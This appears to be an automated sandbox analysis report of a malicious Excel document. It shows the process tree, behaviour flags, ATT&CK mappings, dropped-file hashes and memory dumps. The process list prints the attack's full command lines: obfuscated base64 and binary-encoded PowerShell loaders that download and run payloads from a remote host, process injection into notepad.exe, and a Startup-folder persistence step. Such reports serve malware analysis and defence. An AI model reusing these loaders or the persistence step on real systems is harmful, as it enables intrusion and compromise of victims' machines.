PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c4fa78775e976b5e30d4f2fb71d48b068b3dc27d625972296fd5cc28c58eb1c0.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\Jasfu.bat" "
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PowerShell -WindowStyle hidden IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICdTaWxlbnRseUNvbnRpbnVlJzskdTBoajQ0dHQgPSAnW0VudW1dOjpUb09iamVjdChbU3lzdGVtLk4nICsnZXQuU2VjdXJpJyArJ3R5UHJvdG8nICsnY29sVHlwZV0sIDMwNzIpJ3xJRVg7W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgPSAkdTBoajQ0dDskd2UyMj0nZVcudGVOIHRjJyArICdlamJPLXdlTignOyAkYjRkZj0nb2xud29ELil0bmVpJyArICdsQ2InOyAkYzM9JyknJ3Nidi5kYXBldG9uXCcnK3BtZXQ6dm5lJCwnJ3Nidi50bmVpbEMgZGV0Y2V0b3JQL2V0b24vbG0uenJibWVsYWNpZ29sb2NhbXJhaHAvLzpwdHRoJycoZWxpRmRhJzskVEM9JGMzLCRiNGRmLCR3ZTIyIC1Kb2luICcnO0lFWCgoW3JlZ2V4XTo6TWF0Y2hlcygkVEMsJy4nLCdSaWdodFRvTGVmdCcpIHwgRm9yRWFjaCB7JF8udmFsdWV9KSAtam9pbiAnJyk7c3RhcnQtcHJvY2VzcygkZW52OnRlbXArICdcbm90ZXBhZC52YnMnKTtyZW1vdmUtaXRlbSAoJGVudjpVU0VSUFJPRklMRSArICdcSmFzZnUuYmF0Jyk=')))
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:804

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\notepad.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01110000,01101000,01100001,01110010,01101101,01100001,01100011,01101111,01101100,01101111,01100111,01101001,01100011,01100001,01101100,01100101,01101101,01100010,01110010,01111010,00101110,01101101,01101100,00101111,01101110,01101111,01110100,01100101,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948

C:\WINDOWS\syswow64\notepad.exe
"C:\WINDOWS\syswow64\notepad.exe"
6⤵
PID:1868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\notepad.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.vbs'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:976

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:976 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1616

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

2

T1082

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\notepad.vbs
Filesize
2KB

MD5
8e83d5756f11160d34fccb12e2bf0381

SHA1
af4152d4ab87a2d6634bd19fb7818606a8f6bccf

SHA256
b07844c7581de9dcd8ce32a00da25a829d5b72a40d782e873ba8494e4a21f19c

SHA512
fa4fd495e32f200418564caa63abab53686b90f8729d5666870ea254bc0f902bd6d7d8023eaaedd08e7336f20667a7296ece6644026fe65ca814c01eed737eac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
b8e7ea910b0f255d8792c949043dd95e

SHA1
0fa9662c22693a9bf5144829bcf7a62d09bab20c

SHA256
ca04ea7fe8b53e1c78338a041119e260b6131e92b0389d6d5b449a296283f225

SHA512
21da8a5d60f3beb33b5a2fb804b6c25cd82c82cb4b768dbdaf0d605899c1a29439d5b4e4d2d7aa8fd266aa1ab19cfea728256c2808363f6b6aa9c035aa1adc5d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
b8e7ea910b0f255d8792c949043dd95e

SHA1
0fa9662c22693a9bf5144829bcf7a62d09bab20c

SHA256
ca04ea7fe8b53e1c78338a041119e260b6131e92b0389d6d5b449a296283f225

SHA512
21da8a5d60f3beb33b5a2fb804b6c25cd82c82cb4b768dbdaf0d605899c1a29439d5b4e4d2d7aa8fd266aa1ab19cfea728256c2808363f6b6aa9c035aa1adc5d

Download Submit
C:\Users\Admin\Jasfu.bat
Filesize
863B

MD5
8ef8366f9ab07697612c33f7b0fd1b81

SHA1
80a2b96b8fe1d7fa9dedd98b9b6d6342162bc709

SHA256
92047d952a45aa6d0b20b167fba511a1b947d54886f852b9f8ce8e9a62ed648d

SHA512
29d6681c58215248790b5879e6d091d9929c9adb8036402531405f1b6266c22b47dd9e70fcd5ccdc9351d59c499b7cc0aa3a8e38a3a6c9989050f36fdac95881

Download Submit
\Users\Admin\AppData\Local\Temp\8ae16271-0e6b-4817-88a8-469fd467cc94\AgileDotNetRT.dll
Filesize
94KB

MD5
14ff402962ad21b78ae0b4c43cd1f194

SHA1
f8a510eb26666e875a5bdd1cadad40602763ad72

SHA256
fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

SHA512
daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

Download Submit
memory/804-89-0x000000006C080000-0x000000006C62B000-memory.dmp

Filesize
5.7MB

Download
memory/804-85-0x000000006C080000-0x000000006C62B000-memory.dmp

Filesize
5.7MB

Download
memory/804-83-0x0000000000000000-mapping.dmp

Download
memory/840-97-0x000000006BAD0000-0x000000006C07B000-memory.dmp

Filesize
5.7MB

Download
memory/840-92-0x0000000000000000-mapping.dmp

Download
memory/948-98-0x000000006BAD0000-0x000000006C07B000-memory.dmp

Filesize
5.7MB

Download
memory/948-117-0x000000006BAD0000-0x000000006C07B000-memory.dmp

Filesize
5.7MB

Download
memory/948-118-0x0000000002410000-0x0000000002438000-memory.dmp

Filesize
160KB

Download
memory/948-91-0x0000000000000000-mapping.dmp

Download
memory/1636-81-0x0000000000000000-mapping.dmp

Download
memory/1868-106-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-107-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-121-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-120-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-119-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-113-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-114-0x000000000043168C-mapping.dmp

Download
memory/1868-111-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-108-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-104-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-102-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-101-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1868-109-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/2012-74-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-55-0x0000000071AD1000-0x0000000071AD3000-memory.dmp

Filesize
8KB

Download
memory/2012-64-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-62-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-58-0x0000000075791000-0x0000000075793000-memory.dmp

Filesize
8KB

Download
memory/2012-77-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-65-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-90-0x0000000072ABD000-0x0000000072AC8000-memory.dmp

Filesize
44KB

Download
memory/2012-57-0x0000000072ABD000-0x0000000072AC8000-memory.dmp

Filesize
44KB

Download
memory/2012-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2012-54-0x000000002F7C1000-0x000000002F7C4000-memory.dmp

Filesize
12KB

Download
memory/2012-73-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-63-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-79-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-61-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-72-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-67-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-71-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-78-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-70-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-76-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-80-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-69-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-68-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-66-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2012-75-0x0000000000782000-0x000000000078C000-memory.dmp

Filesize
40KB

Download
memory/2040-86-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads